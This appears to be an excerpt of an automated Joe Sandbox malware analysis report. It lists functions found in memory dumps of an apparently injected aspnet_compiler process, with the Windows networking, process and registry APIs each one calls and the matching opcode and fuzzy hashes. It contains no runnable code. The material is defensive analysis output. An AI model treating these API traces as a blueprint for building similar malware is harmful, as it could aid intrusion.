                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0134A7F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 92644d8946743d10d414fd81e953ae6e9917ec7dbcf477ab173954654d8cb605
                                                                                                                                                                        • Instruction ID: 5fb7576d3a284333815032a273fd691c7912f42f2f4d7832114aadbab7a68dcd
                                                                                                                                                                        • Opcode Fuzzy Hash: 92644d8946743d10d414fd81e953ae6e9917ec7dbcf477ab173954654d8cb605
                                                                                                                                                                        • Instruction Fuzzy Hash: CD117272449380AFDB228F55DC44A62FFF4EF4A220F08859AED858B163D375A419DB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B25A, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • TerminateProcess.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B2B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                                                        • Opcode ID: 58bcbd076d8e346fa5f11105f6ef0e47131d4596629338b107936bee483d5b89
                                                                                                                                                                        • Instruction ID: 630577530dcd41173ee71c2408907725a54bcd56656c639504ee7c61d79a070c
                                                                                                                                                                        • Opcode Fuzzy Hash: 58bcbd076d8e346fa5f11105f6ef0e47131d4596629338b107936bee483d5b89
                                                                                                                                                                        • Instruction Fuzzy Hash: 2611C671504244AFEB12CF29DE85B6AFBDCEF45320F1484AAED45DB246D674E4048BB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41122, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • setsockopt.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: setsockopt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3981526788-0
                                                                                                                                                                        • Opcode ID: 12cbc6c6bdf5cea31f0c4003008f30685622c72f1cc1dd396ee34e07ecfff278
                                                                                                                                                                        • Instruction ID: 9839fcd0256ed203aabc62ed7ddc89c077354b4590fee8a20c53cfdb9a1dc3f3
                                                                                                                                                                        • Opcode Fuzzy Hash: 12cbc6c6bdf5cea31f0c4003008f30685622c72f1cc1dd396ee34e07ecfff278
                                                                                                                                                                        • Instruction Fuzzy Hash: F011C171400200AFEB22CF55DE45FAAFBA8EF44320F14856AED859B252D374A448CFB6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D41FBA, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ioctlsocket.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42013
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ioctlsocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3577187118-0
                                                                                                                                                                        • Opcode ID: efa7af739fa163c82c62d2da5a9146af213cc33df7dea510cf4c63ae6ad5e6e8
                                                                                                                                                                        • Instruction ID: ac3a6829414e0d78c0859c2f50709ffb0834f60e4f653216472110f99daf1f8e
                                                                                                                                                                        • Opcode Fuzzy Hash: efa7af739fa163c82c62d2da5a9146af213cc33df7dea510cf4c63ae6ad5e6e8
                                                                                                                                                                        • Instruction Fuzzy Hash: F011A371500244AFEB22DF55DE49F76FBE8EF44320F14846BED49AB242D274A448CBB6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42CA2, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42D01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdaptersAddresses
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2506852604-0
                                                                                                                                                                        • Opcode ID: 10b72a666610eee04444f91c31c18e0250eead49b2417a64ab47cace2d180a8b
                                                                                                                                                                        • Instruction ID: 448c08c5256e9ed5f16d374bab9f4b9a99e946652c858e266d4526fa5b2d41da
                                                                                                                                                                        • Opcode Fuzzy Hash: 10b72a666610eee04444f91c31c18e0250eead49b2417a64ab47cace2d180a8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A110235000200AFEB228F15CE85FB6FBA8EF08320F14859BED855B252C370A408CFB2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,00000E2C), ref: 05D4058B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: ffeef9c2c754c74603c91e7129884453e12e2819ab58ddbb474cd8cb41438f4e
                                                                                                                                                                        • Instruction ID: 6147aae144dd6e03d08b234aa0f05d73094ec048277b7fd80f8bdec51f2f2495
                                                                                                                                                                        • Opcode Fuzzy Hash: ffeef9c2c754c74603c91e7129884453e12e2819ab58ddbb474cd8cb41438f4e
                                                                                                                                                                        • Instruction Fuzzy Hash: E611E971500240AFE721DB15DD49F76FBA8DF04710F14805AEE445F282D275A508CBB5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42F2E, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: select
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                                        • Opcode ID: 09d06392feb239efd1cea0dc988ac7283d00af205fe502ef68d9e4409980d81b
                                                                                                                                                                        • Instruction ID: cd672998f1be5dd05268d269daf2de642cadf6cb7234037d85330825b37bf931
                                                                                                                                                                        • Opcode Fuzzy Hash: 09d06392feb239efd1cea0dc988ac7283d00af205fe502ef68d9e4409980d81b
                                                                                                                                                                        • Instruction Fuzzy Hash: F1112B755042449FDB20CF56D984B66FBE8EF44710F4885AAED49CB216D330E448CF62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D4235A, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RasConnectionNotificationW.RASAPI32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D423B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1402429939-0
                                                                                                                                                                        • Opcode ID: a461bd0f13c20688853291054e3f3ce8ecf5e6e7636d4210802fc0aeacb7eafe
                                                                                                                                                                        • Instruction ID: 65f6bd72e834f6c273c31199838c3a9c0717748af08d335ad007947fc3650130
                                                                                                                                                                        • Opcode Fuzzy Hash: a461bd0f13c20688853291054e3f3ce8ecf5e6e7636d4210802fc0aeacb7eafe
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E11E575500204AFE721CB15CE89F76FBA8EF04320F14846BED849B241D374A408CFB6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                        • Opcode ID: c74ae218ef21ad6f728d683ede5822b10affd3b3393a295985574bb49aadd8db
                                                                                                                                                                        • Instruction ID: 1b66884f4bea7446828e693c3cde6df9e5d8817af80480d85cc9f867d64ddd80
                                                                                                                                                                        • Opcode Fuzzy Hash: c74ae218ef21ad6f728d683ede5822b10affd3b3393a295985574bb49aadd8db
                                                                                                                                                                        • Instruction Fuzzy Hash: 20118C71449380AFDB22CF15DC44B56FFB4EF5A224F08859EED898F663C275A418CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A44B, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: closesocket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2781271927-0
                                                                                                                                                                        • Opcode ID: 0f6778b432bedf494e4e71135a8d5327931d98a5959fc85b75ecd8fd9c452266
                                                                                                                                                                        • Instruction ID: 02d978b264adbd9097428f1bfb97c3a5f35b0d8d9f2ce641bc95659fe1f34106
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6778b432bedf494e4e71135a8d5327931d98a5959fc85b75ecd8fd9c452266
                                                                                                                                                                        • Instruction Fuzzy Hash: FA116D714493C4AFD7128B15DC44B56BFB4EF46224F1884DBED899F293D279A408CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0134AD6A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        • Opcode ID: 5fe0569ec6d19f1e39402cf1d24876658400c4f9813a4c95172d356b8ef98fb4
                                                                                                                                                                        • Instruction ID: c232604c09a8128aaa6fae009580b16f2d4cecee4f45b9df4cb1c3e2e6ffd3ac
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fe0569ec6d19f1e39402cf1d24876658400c4f9813a4c95172d356b8ef98fb4
                                                                                                                                                                        • Instruction Fuzzy Hash: 2211A171A402409FEB61CF29DD84756FBE8EF45225F08C46ADD8ACB652D674E404CB72
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40F92, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileType.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D40FE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3081899298-0
                                                                                                                                                                        • Opcode ID: b74ce331810d67fec1903d09581be9a5fabf6581c0f4adb36160a71170a7ad0d
                                                                                                                                                                        • Instruction ID: ca36b7a51ca4b8621af0feda695f85240e1f8116596ad872ade3bcce48b9db60
                                                                                                                                                                        • Opcode Fuzzy Hash: b74ce331810d67fec1903d09581be9a5fabf6581c0f4adb36160a71170a7ad0d
                                                                                                                                                                        • Instruction Fuzzy Hash: EB01D671500240AFE711CB15DE49F76FB9CEF05720F1480ABED45AF242D274A548CBB6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D40BEE, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MoveFileExW.KERNELBASE(?,?,?), ref: 05D40C39
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileMove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562171763-0
                                                                                                                                                                        • Opcode ID: 0329413d54280d83921f4bacc621d22f4207365ea790cb4eea2c5fcfb73a830b
                                                                                                                                                                        • Instruction ID: fc1e55212066f33092dad621f95f40164e49b4828dcaaa35eb330210f4d8dbed
                                                                                                                                                                        • Opcode Fuzzy Hash: 0329413d54280d83921f4bacc621d22f4207365ea790cb4eea2c5fcfb73a830b
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A113C715046449FEB61DF19D988B56FBE8EB54620F0885AADE89CF602D274E408CF62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D42E66, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05D42EB2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Connect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3144859779-0
                                                                                                                                                                        • Opcode ID: 0f74c60593ba78f0f95c6cf0d195ba10308ebcead650bfaa5301b8af67fa8000
                                                                                                                                                                        • Instruction ID: 94cae5681aecf0962f0e010dbc142a5663da7f5cea8d455263ff9933f78c06d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f74c60593ba78f0f95c6cf0d195ba10308ebcead650bfaa5301b8af67fa8000
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F115735500644AFDB21CF55D984B66FBE4FF08320F08C5AAEE898B622D331E418CF62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B786, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0134B7D1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                        • Opcode ID: 2d98a0eaf41609a940a3cc2c5ab8d343d5937526076518cdef7f483b1b72601b
                                                                                                                                                                        • Instruction ID: 7ae5aab7b2252cc402bb031403aba0623a091b1d460e32dd21812a18d3676a63
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d98a0eaf41609a940a3cc2c5ab8d343d5937526076518cdef7f483b1b72601b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F01B171500200ABD350DF1ADC81F2AFBA8EB88B20F14C12AED089B641D731B515CBA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0134A7F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 7fe4ef68965bf62f973d50ff83b24303552c8b55d6b77f75af0eb5142562f910
                                                                                                                                                                        • Instruction ID: 1f724bf14d615633d41b43d94c32b873c54f2329e7b729fa0424d7b5126289fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fe4ef68965bf62f973d50ff83b24303552c8b55d6b77f75af0eb5142562f910
                                                                                                                                                                        • Instruction Fuzzy Hash: 4701C4324002449FEB22CF55D944B26FFE4EF08320F08C55ADE8A4B612D331A418CF62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05D412DA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05D4132A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConnectionsEnum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3832085198-0
                                                                                                                                                                        • Opcode ID: 4b462ddb9c2a385e9d434ae6df884d281a4692ad8543721fbbe6ef8e5b27ee35
                                                                                                                                                                        • Instruction ID: 8b670c3c603af8ed52773a778606d3f78422d3f5e69f697df2e2099877ef1378
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b462ddb9c2a385e9d434ae6df884d281a4692ad8543721fbbe6ef8e5b27ee35
                                                                                                                                                                        • Instruction Fuzzy Hash: C5018F75500200ABD254DF1ADC82B26FBA8EB88B20F14C11AED085B641D731B515CAA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AB2E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0134AB7E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DisplayNameParse
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3580041360-0
                                                                                                                                                                        • Opcode ID: 1c2b63b90ae285cf4ee101ffa78401ffd8005a5b1986da34722327fac5ea382f
                                                                                                                                                                        • Instruction ID: 3a8338780331892bed286434d106c7bdf4d8826a621a5fb80032993f9ac03320
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c2b63b90ae285cf4ee101ffa78401ffd8005a5b1986da34722327fac5ea382f
                                                                                                                                                                        • Instruction Fuzzy Hash: 05018B75600200ABD254DF1ADC82B26FBA8FB88B20F14C21AED085B641E731B915CBA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B00E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134B040
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: 9909e262d964772b113e8d8639c8fe55b1dfdddc9ffc78ffdb84ae4e2a741db3
                                                                                                                                                                        • Instruction ID: ace5ce00d1f3ec063be7ac0ff7730bcec94083ad7472e1737096fdb1d834fdcf
                                                                                                                                                                        • Opcode Fuzzy Hash: 9909e262d964772b113e8d8639c8fe55b1dfdddc9ffc78ffdb84ae4e2a741db3
                                                                                                                                                                        • Instruction Fuzzy Hash: F701F2715002448FDB11CF19D988756FBE8EF44325F08C0AADD498F616C374E408CB72
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134AC76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 0134ACA8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: 311650b1284a335b5cf79f2ae5cbe0870e4e664ff0c98ac329117507f1b2ac00
                                                                                                                                                                        • Instruction ID: 1f8a26c5a1295b322674883d1ce89d2177f8eda6b30e1f5633cac238c70bd609
                                                                                                                                                                        • Opcode Fuzzy Hash: 311650b1284a335b5cf79f2ae5cbe0870e4e664ff0c98ac329117507f1b2ac00
                                                                                                                                                                        • Instruction Fuzzy Hash: BB01F2315402449FDB51CF19D988766FBD8EF04320F18C0AADD4ACF652D274A808CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134B4E2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0134B532
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        • Opcode ID: 971aeb62c1dce89bd0b0c874355d4cd14653f1de992aeec275200a4c6dec5234
                                                                                                                                                                        • Instruction ID: 9043faf5c49ea16acf3bf5cafc25aba897be79f344abfa816b0644b72fe7f1df
                                                                                                                                                                        • Opcode Fuzzy Hash: 971aeb62c1dce89bd0b0c874355d4cd14653f1de992aeec275200a4c6dec5234
                                                                                                                                                                        • Instruction Fuzzy Hash: 7A018B75600204ABD254DF1ADC82B26FBA8EB88B20F14C21AED085B641E771B915CAA6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0134A09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: send
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                        • Opcode ID: 5ec0a913e456caa8179a88165cb4989ebab40b4a40a9b79ce2a409b4c8f54b68
                                                                                                                                                                        • Instruction ID: 4ab97957dfa4114c035a36c1664a6eb0ec74ff472da51547095ea16edf14f51c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ec0a913e456caa8179a88165cb4989ebab40b4a40a9b79ce2a409b4c8f54b68
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A01B1314442449FDB21CF59D984B55FFE4EF44324F08C5AADD8A8B612D375A008CB72
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

